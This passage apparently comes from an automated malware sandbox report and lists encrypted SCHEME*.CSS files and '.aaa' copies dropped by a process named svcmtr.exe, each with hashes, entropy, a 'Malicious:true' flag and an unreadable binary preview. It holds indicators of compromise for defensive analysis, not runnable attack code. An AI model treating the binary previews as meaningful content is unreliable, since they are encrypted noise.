                                                                                                                          SSDEEP:3072:YXJU9UzK3dpU5ebaqx7OiCLosC1rM+pfBk6d+T:YXK9UzF5ebaqx7O/C1XfBk6da
                                                                                                                          MD5:49CC5FA052136AD43A6EF39A625857F9
                                                                                                                          SHA1:B50FC7F77C3E2064EFD602E3EEE14B582BB1D7E6
                                                                                                                          SHA-256:C922868EACE2B6DF36A573C6A75675959BF38D9725FFA298AA36380FCC4A98A5
                                                                                                                          SHA-512:C62DAA6533C7F4399CBE603A1404B027E3BB4D7034389ECB54BB9579303FF3C7D1F2A1AE21DCE5A354F967F6F3D1945396AE40BA97EE041F50788C5A80E4A1F9
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...=e9P..G........T....Y.&?..D..8...w.j.X.vrO..#.q"......w.?..yTR.D...p...@Vy``p&...X...}7+...\.i...)9..AZ....FJ.XW\.:..:...M.gR.h...~....C.o.a.nc.y.8.v-.y...Y."..;.....{`t.|*..@ho..!M.I....c..VC)V.Mj.4..ku.&J......z..>.1..%Gs.....>.@O0_.DP..g..b.nOjGE.*X.....3..D7..m.>"..7..QQ...M.o).R.|..}......`.`$PY./..j][C.F.#..@.'B....&a......wl*<2...|..=...F..?D;...a.......K'.tS#\]:.......pV....z.h.|....oy..'.....V.......7....o+.).....a..3.~?3,GV~.la.....i...8..4.....9...M..n...Bd.......*..."j.i,U......'.}.I.....(G..d?..u....d.i..g...gk...M.{...OZ..8+.;.]B0......._.... .m8.....g

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME28.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):121086
                                                                                                                          Entropy (8bit):7.99852619771096
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:YXJU9UzK3dpU5ebaqx7OiCLosC1rM+pfBk6d+T:YXK9UzF5ebaqx7O/C1XfBk6da
                                                                                                                          MD5:49CC5FA052136AD43A6EF39A625857F9
                                                                                                                          SHA1:B50FC7F77C3E2064EFD602E3EEE14B582BB1D7E6
                                                                                                                          SHA-256:C922868EACE2B6DF36A573C6A75675959BF38D9725FFA298AA36380FCC4A98A5
                                                                                                                          SHA-512:C62DAA6533C7F4399CBE603A1404B027E3BB4D7034389ECB54BB9579303FF3C7D1F2A1AE21DCE5A354F967F6F3D1945396AE40BA97EE041F50788C5A80E4A1F9
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...=e9P..G........T....Y.&?..D..8...w.j.X.vrO..#.q"......w.?..yTR.D...p...@Vy``p&...X...}7+...\.i...)9..AZ....FJ.XW\.:..:...M.gR.h...~....C.o.a.nc.y.8.v-.y...Y."..;.....{`t.|*..@ho..!M.I....c..VC)V.Mj.4..ku.&J......z..>.1..%Gs.....>.@O0_.DP..g..b.nOjGE.*X.....3..D7..m.>"..7..QQ...M.o).R.|..}......`.`$PY./..j][C.F.#..@.'B....&a......wl*<2...|..=...F..?D;...a.......K'.tS#\]:.......pV....z.h.|....oy..'.....V.......7....o+.).....a..3.~?3,GV~.la.....i...8..4.....9...M..n...Bd.......*..."j.i,U......'.}.I.....(G..d?..u....d.i..g...gk...M.{...OZ..8+.;.]B0......._.... .m8.....g

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME29.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126190
                                                                                                                          Entropy (8bit):7.998667997567852
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:eMIsHm6a1U8cLqjGSwP7if1M4C3P1otUNVyehdp/yKf1ALuId/nlsWV2EBLi6ONb:eMdHmG9Sc7q1c3P1oteVR8RyiyB7c2FN
                                                                                                                          MD5:7C060985CC5D990AE8AF3BE810CC2522
                                                                                                                          SHA1:E52C2FDC7288CFFECFAE57EDE67D875983364EA5
                                                                                                                          SHA-256:056260DA6743FE4D46C7FEC02DF9387A166C59360F61A0FF64249AA2EECD9614
                                                                                                                          SHA-512:2211465C21044BDE807E7544E39620C767277A9FD731AB336621062CC4F4595928AF2BB0B1F3705BB90CC0DB1B57314FC6AB4A4C5E1D4F3DB62775EF7CAB1029
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..K..Q..t......7.J....B...xHy.G....i.RX..R..,..M.". .m)...........nP..J)....V|.A....>(..c.m1...{..../.)........\|2..[..*L?f.Y.S...fI2o}.'.j.w...B...nI.0...I...Q..L...'.O8.Y.|...&NS..lo $..._.Sz.f.....o`...m.......78..f.g.A..+.H..>..L.axtp.Yk}.....].zQ.0...v...}....9.R..m....V......]_...W...N |n=}$...C&q."-...C..h..au.#.....6Y.k.9X.9....1..4..O.D..-.w...*..f'y....:.$PL.Y.o..*....h.j?.6+?.W...t...Q.Q..u....X..6......+../.PX..^!n.lk.w^...7..,.....y..9..*"QG.Bkz....l..*.<2.e{...!.JM.k...m+.6yT.......}.c.Q.nL....C............M).a...f...z..Z.9... .JSH*F*.?^.....F.N.......m..<.[.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME29.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126190
                                                                                                                          Entropy (8bit):7.998667997567852
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:eMIsHm6a1U8cLqjGSwP7if1M4C3P1otUNVyehdp/yKf1ALuId/nlsWV2EBLi6ONb:eMdHmG9Sc7q1c3P1oteVR8RyiyB7c2FN
                                                                                                                          MD5:7C060985CC5D990AE8AF3BE810CC2522
                                                                                                                          SHA1:E52C2FDC7288CFFECFAE57EDE67D875983364EA5
                                                                                                                          SHA-256:056260DA6743FE4D46C7FEC02DF9387A166C59360F61A0FF64249AA2EECD9614
                                                                                                                          SHA-512:2211465C21044BDE807E7544E39620C767277A9FD731AB336621062CC4F4595928AF2BB0B1F3705BB90CC0DB1B57314FC6AB4A4C5E1D4F3DB62775EF7CAB1029
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..K..Q..t......7.J....B...xHy.G....i.RX..R..,..M.". .m)...........nP..J)....V|.A....>(..c.m1...{..../.)........\|2..[..*L?f.Y.S...fI2o}.'.j.w...B...nI.0...I...Q..L...'.O8.Y.|...&NS..lo $..._.Sz.f.....o`...m.......78..f.g.A..+.H..>..L.axtp.Yk}.....].zQ.0...v...}....9.R..m....V......]_...W...N |n=}$...C&q."-...C..h..au.#.....6Y.k.9X.9....1..4..O.D..-.w...*..f'y....:.$PL.Y.o..*....h.j?.6+?.W...t...Q.Q..u....X..6......+../.PX..^!n.lk.w^...7..,.....y..9..*"QG.Bkz....l..*.<2.e{...!.JM.k...m+.6yT.......}.c.Q.nL....C............M).a...f...z..Z.9... .JSH*F*.?^.....F.N.......m..<.[.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME30.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):120526
                                                                                                                          Entropy (8bit):7.998494587962549
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:DAHnuW4o0wTp3pD/sb8ENmrauqLsjVe7hA/kJseEUX3qO1Tw44bk0TBfOV6W4LZD:DAHnuS06ZIb8w7Wo9U74yk0tWSDt
                                                                                                                          MD5:A14FA501B317B9BA3C264961DBF3F734
                                                                                                                          SHA1:00C21A58AE9B59C1F062D0E7C4D409F211CCF253
                                                                                                                          SHA-256:65B0CE45C6C1DF2DACD3CBA869A4A9BEDF894D2E5A68463338DED7A97E1B081E
                                                                                                                          SHA-512:AE546EF95425586B38121E45C4C71E74850608D06E1CAA78A01614E472D20668CEB3B43A594CF75188816E61629607180C6C92BE759C6429FB6287AC7CDF8293
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...1.j...^....3,.."...EPzO....a?.......Hg!...U...).+..vs..M......h...Z.5..'..oJj)+G.8.i.'>..|.y.xp.=.?.?...}...}4$m.W.....2.....D...u.pi.9.k...J.#....%..ka.%PD$..S^t.O.6.a.....\#+..Qr.;h..Jy......O.....).8....v6..... .....NE..yz .c.^....0O....h* .......b....^....u....?.U[...:...d.............}.k....u.d3....c.%D.tD...t.g..B..w..b.XF.7c.....%g#....2.9....O...>.^.f...".K.J.....{.6n.u:.G..KS..a.% tVa...........|p.<.......-...&..>..W..>.W... ...L.<......r.mi.'(..G'N.h..I....L.....:.]K`]..{9.b.e.m.a./?..'t..7..-...(..&E....kI...N..wqB..5...t.R..g.r......;.96...=......5.u7W.E).U

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME30.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):120526
                                                                                                                          Entropy (8bit):7.998494587962549
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:DAHnuW4o0wTp3pD/sb8ENmrauqLsjVe7hA/kJseEUX3qO1Tw44bk0TBfOV6W4LZD:DAHnuS06ZIb8w7Wo9U74yk0tWSDt
                                                                                                                          MD5:A14FA501B317B9BA3C264961DBF3F734
                                                                                                                          SHA1:00C21A58AE9B59C1F062D0E7C4D409F211CCF253
                                                                                                                          SHA-256:65B0CE45C6C1DF2DACD3CBA869A4A9BEDF894D2E5A68463338DED7A97E1B081E
                                                                                                                          SHA-512:AE546EF95425586B38121E45C4C71E74850608D06E1CAA78A01614E472D20668CEB3B43A594CF75188816E61629607180C6C92BE759C6429FB6287AC7CDF8293
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...1.j...^....3,.."...EPzO....a?.......Hg!...U...).+..vs..M......h...Z.5..'..oJj)+G.8.i.'>..|.y.xp.=.?.?...}...}4$m.W.....2.....D...u.pi.9.k...J.#....%..ka.%PD$..S^t.O.6.a.....\#+..Qr.;h..Jy......O.....).8....v6..... .....NE..yz .c.^....0O....h* .......b....^....u....?.U[...:...d.............}.k....u.d3....c.%D.tD...t.g..B..w..b.XF.7c.....%g#....2.9....O...>.^.f...".K.J.....{.6n.u:.G..KS..a.% tVa...........|p.<.......-...&..>..W..>.W... ...L.<......r.mi.'(..G'N.h..I....L.....:.]K`]..{9.b.e.m.a./?..'t..7..-...(..&E....kI...N..wqB..5...t.R..g.r......;.96...=......5.u7W.E).U

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME31.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):120830
                                                                                                                          Entropy (8bit):7.998278983352778
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:v1TuEztdQqfgoXi23j+gyn4bTxSCgl62hh2oz:vtuEzY3oSGj+gdb95jshJ
                                                                                                                          MD5:003FBA50285DEA3C713A3B8AD780D888
                                                                                                                          SHA1:81B2068E9253A94B95651ACD55633B89A70431CD
                                                                                                                          SHA-256:1F5E353FD153C9FEC4E1AD75F0A7249DFC25B5F4BB3C087C5A0FEA265B44C006
                                                                                                                          SHA-512:4B1B221136CD60DC53C70E8780FDF6095B3C4D889A8C90069749F3FEB1D7B69FEDC81FE8EDE1BDA3ED4D21D01A9FD82C5FFCFA37A2F77DE68FE73D537791C368
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......P.h....s.9.R...>c.)6r.wM ..?.r+..K^...e}..o..F...~i.;#D.d.G...;.FQr.J7W.......%....H(.Z.V.`..A........r..T.`'9'=!{..+..;_...+)...._.8!}Gc/;Yl.W'G..P.N....-|P.. .0...X. 2.....I...C.z..s..VN6=.c...[E..|..y$;.uY..?.. f,Du..k.. .=.!'.)')$.w...rC.......Y..q.{z.:"....r/.....jD.s6.t.=7..4.....z..>p.s....VI......{F.o1.zk^c2*X.y.q...R....J.....W....D.}...j...g..e..R..J.AL....2.M......8.C<.5..........8...'M....1=.E...e.htg...A.H?..*-...."O.{zSIE. &,..C......^.t.[.Gg.U.V.5y.E...^4@....cQ.....]...x..JHC.P..c.......k......BM.cV.pO....)..p...l.{.......".\......:....A....m.[..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME31.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):120830
                                                                                                                          Entropy (8bit):7.998278983352778
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:v1TuEztdQqfgoXi23j+gyn4bTxSCgl62hh2oz:vtuEzY3oSGj+gdb95jshJ
                                                                                                                          MD5:003FBA50285DEA3C713A3B8AD780D888
                                                                                                                          SHA1:81B2068E9253A94B95651ACD55633B89A70431CD
                                                                                                                          SHA-256:1F5E353FD153C9FEC4E1AD75F0A7249DFC25B5F4BB3C087C5A0FEA265B44C006
                                                                                                                          SHA-512:4B1B221136CD60DC53C70E8780FDF6095B3C4D889A8C90069749F3FEB1D7B69FEDC81FE8EDE1BDA3ED4D21D01A9FD82C5FFCFA37A2F77DE68FE73D537791C368
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......P.h....s.9.R...>c.)6r.wM ..?.r+..K^...e}..o..F...~i.;#D.d.G...;.FQr.J7W.......%....H(.Z.V.`..A........r..T.`'9'=!{..+..;_...+)...._.8!}Gc/;Yl.W'G..P.N....-|P.. .0...X. 2.....I...C.z..s..VN6=.c...[E..|..y$;.uY..?.. f,Du..k.. .=.!'.)')$.w...rC.......Y..q.{z.:"....r/.....jD.s6.t.=7..4.....z..>p.s....VI......{F.o1.zk^c2*X.y.q...R....J.....W....D.}...j...g..e..R..J.AL....2.M......8.C<.5..........8...'M....1=.E...e.htg...A.H?..*-...."O.{zSIE. &,..C......^.t.[.Gg.U.V.5y.E...^4@....cQ.....]...x..JHC.P..c.......k......BM.cV.pO....)..p...l.{.......".\......:....A....m.[..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME32.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126158
                                                                                                                          Entropy (8bit):7.998310079259126
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:VPVnbFQsSWLzBpekogHR5rQEqa0uUJrzD0smE+QE5+LxAL5pwkhs+:V9nbP7zBpekpQWyrv0tE+QX9q3wkhX
                                                                                                                          MD5:907304316DB7B4A804E8EA4DB24734AE
                                                                                                                          SHA1:46BC753A38BF840B6BAC6F273FCBA92C968AD43A
                                                                                                                          SHA-256:935DDBF193D085741D2C4EC07ABE5F4AB782BBCD4798134A1A7C61570D21758E
                                                                                                                          SHA-512:79250753935D08785AC5AD9DF710BB1CB3E947732C7FDCBCCE7768965C37A34C44B692AB2E01D397A475A4295CC16127229132410B52DAA8D441A4942C4FE6C6
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..&...a.......... ...l..R..B.....7.O+m....{uG'i..8u.bh..M~u.H......&.}C..g.MwL..H.r...[....Ad.~...f}..vE}....+i@.(..%.*c..Hj>...T..7.`;.%.h.e`.[.......UB4...)Ab..$.3.."...<.......k.%..N>.1..Wy6BJ....a"e..G.p..i...._(.....;.....=_._.31d+.....vc..Y..3.<3.r...3/....-d..i.:[.(C.......R.u..S.).O.g.a^PK...t.;.....N..f.b.o.E...N..C........D...J...%...CGb....EH;....@>X<E....c...$...S..~.)...\..).]........{L...3.....O.{.%..y.>..*.G....0jce.H..=-.#y.d..q..s6..[.m..R....g.....7.z.F...s..R.u!kr6..,I^.|\._...k%c.........5[......,.P...dnH.Q...=x..~.Tu.b..5.&W.&.k;^F.dHj m#...N..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME32.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126158
                                                                                                                          Entropy (8bit):7.998310079259126
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:VPVnbFQsSWLzBpekogHR5rQEqa0uUJrzD0smE+QE5+LxAL5pwkhs+:V9nbP7zBpekpQWyrv0tE+QX9q3wkhX
                                                                                                                          MD5:907304316DB7B4A804E8EA4DB24734AE
                                                                                                                          SHA1:46BC753A38BF840B6BAC6F273FCBA92C968AD43A
                                                                                                                          SHA-256:935DDBF193D085741D2C4EC07ABE5F4AB782BBCD4798134A1A7C61570D21758E
                                                                                                                          SHA-512:79250753935D08785AC5AD9DF710BB1CB3E947732C7FDCBCCE7768965C37A34C44B692AB2E01D397A475A4295CC16127229132410B52DAA8D441A4942C4FE6C6
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..&...a.......... ...l..R..B.....7.O+m....{uG'i..8u.bh..M~u.H......&.}C..g.MwL..H.r...[....Ad.~...f}..vE}....+i@.(..%.*c..Hj>...T..7.`;.%.h.e`.[.......UB4...)Ab..$.3.."...<.......k.%..N>.1..Wy6BJ....a"e..G.p..i...._(.....;.....=_._.31d+.....vc..Y..3.<3.r...3/....-d..i.:[.(C.......R.u..S.).O.g.a^PK...t.;.....N..f.b.o.E...N..C........D...J...%...CGb....EH;....@>X<E....c...$...S..~.)...\..).]........{L...3.....O.{.%..y.>..*.G....0jce.H..=-.#y.d..q..s6..[.m..R....g.....7.z.F...s..R.u!kr6..,I^.|\._...k%c.........5[......,.P...dnH.Q...=x..~.Tu.b..5.&W.&.k;^F.dHj m#...N..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME33.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):122462
                                                                                                                          Entropy (8bit):7.99851675107634
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:0piQW9OJzSE0H+sHZez05r9dKXo9TQG3bUhGOJ71BhEsG8R+KRFK/DJPzJPbeG8w:0QQJe9DtlftOxh3+KSJ9juOJy3qtyg
                                                                                                                          MD5:5211206223C3B1BE5A7BAE33E77A2CE1
                                                                                                                          SHA1:4656B6AC3932EB9EA695D0C19BB9DE6AC7C91B61
                                                                                                                          SHA-256:DF58542066D5690428BF72DA8565EEA373574FC14B92EEADFECDF02F9FFFA6BD
                                                                                                                          SHA-512:A224CE2FC3250E453E397F0F580B0752E087BC5380E0AEEA80099D393F7CC946C26B2A430EE000477B9CA592EF8C27E10DE98DA77AA9649FA07C11CE2BAE1661
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......E`...E@...Y.....kr|j.0.........4....Y....2...:.Kl..|.%.K2..4m.G....T...t(....Q.4\IA..l&..X.....8...'..l@.._...f.d.E.{k:./4......UP..1...z...{....z9.<.....#.k..=.....a3../.../UT.[.q...E....".....b.h..Pc......6u...6*.#9dQvO.&,`.9..=.u...O....(.]...r/z.....lF\u. ..F4k.`.b..D.w.{.......v........v..@.c:..?.+....R..I.2c[...mn..4......7.nX.4P...DK;.5..R.A.oV[..xL...e.^..?O37.3.k..l......([O<...[gj....a.0:Y'k....<Dp......g.j..A.......(.).~b.......k...i......d.../.:...).}.9..!.. ~$sY..t.._..j...*D.r0W..r...w.....r.$...1....5.i.."..t.b.xY...c.p..h......1......&w.L@.}.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME33.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):122462
                                                                                                                          Entropy (8bit):7.99851675107634
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:0piQW9OJzSE0H+sHZez05r9dKXo9TQG3bUhGOJ71BhEsG8R+KRFK/DJPzJPbeG8w:0QQJe9DtlftOxh3+KSJ9juOJy3qtyg
                                                                                                                          MD5:5211206223C3B1BE5A7BAE33E77A2CE1
                                                                                                                          SHA1:4656B6AC3932EB9EA695D0C19BB9DE6AC7C91B61
                                                                                                                          SHA-256:DF58542066D5690428BF72DA8565EEA373574FC14B92EEADFECDF02F9FFFA6BD
                                                                                                                          SHA-512:A224CE2FC3250E453E397F0F580B0752E087BC5380E0AEEA80099D393F7CC946C26B2A430EE000477B9CA592EF8C27E10DE98DA77AA9649FA07C11CE2BAE1661
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......E`...E@...Y.....kr|j.0.........4....Y....2...:.Kl..|.%.K2..4m.G....T...t(....Q.4\IA..l&..X.....8...'..l@.._...f.d.E.{k:./4......UP..1...z...{....z9.<.....#.k..=.....a3../.../UT.[.q...E....".....b.h..Pc......6u...6*.#9dQvO.&,`.9..=.u...O....(.]...r/z.....lF\u. ..F4k.`.b..D.w.{.......v........v..@.c:..?.+....R..I.2c[...mn..4......7.nX.4P...DK;.5..R.A.oV[..xL...e.^..?O37.3.k..l......([O<...[gj....a.0:Y'k....<Dp......g.j..A.......(.).~b.......k...i......d.../.:...).}.9..!.. ~$sY..t.._..j...*D.r0W..r...w.....r.$...1....5.i.."..t.b.xY...c.p..h......1......&w.L@.}.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME34.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):119502
                                                                                                                          Entropy (8bit):7.998307854610144
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:EiMIe7sMOE6cS8jRv1pezpSxp0iJjijuv3Kbeywb1Gg1XAY:EiRewtAS8jRvLfwi3fOeLhlXF
                                                                                                                          MD5:FBA4CEFE39966FB56E22806D8B99D7D1
                                                                                                                          SHA1:BD4090DEBCB47A3FDEFC24D36D7E8864536378B2
                                                                                                                          SHA-256:5D9A85CA3E3ACAF513D2FB2CB7E89F03A5FC09DF7EBE19875EA8F02CE574C694
                                                                                                                          SHA-512:E5D6FFE7C65C9106A45E049210B62A44D9A674CD0FD1713E3C2002798E900F6A8AECFCB4BB5FA185819566ADB2C4790DCF0435ECA6BDDDBE979940B420841418
                                                                                                                          Malicious:true
